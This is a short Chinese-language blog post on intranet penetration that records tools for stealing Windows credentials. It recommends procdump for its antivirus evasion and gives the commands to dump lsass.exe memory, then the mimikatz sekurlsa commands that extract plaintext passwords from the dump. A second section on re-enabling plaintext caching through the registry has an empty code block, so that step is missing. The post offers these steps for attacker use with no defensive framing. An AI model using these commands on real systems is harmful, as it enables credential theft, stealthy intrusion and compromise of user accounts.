Advertisement

内网渗透-Windows密码凭证获取

阅读量:

以下是一些用于获取Windows系统凭证信息的工具记录
Windows凭证提取技术

1, procdump(官方工具,具备绕过杀毒软件检测的能力)(推荐使用)
通过procdump配合mimikatz读取生成的dmp文件,从而提取其中存储的明文密码(procdump可有效规避杀毒软件检测)

复制代码
    管理员运行工具,导出为lsass.dump文件
    procdump.exe -accepteula -ma lsass.exe lsass.dmp   #32位系统
    procdump.exe -accepteula -64 -ma lsass.exe lsass.dmp #64位系统
    
    将lsass.dmp放在mimikatz同一目录,读取密码文件
    sekurlsa::minidump lsass.dmp
    sekurlsa::logonpasswords full
    
    
      
      
      
      
      
      
      
    

2, 注册表读取windows hash (首选)
针对win10或2012R2及以上版本的操作系统,默认情况下会在内存缓存中禁用明文密码的存储,然而通过调整注册表设置,仍可实现对明文密码的获取。

复制代码

全部评论 (0)

还没有任何评论哟~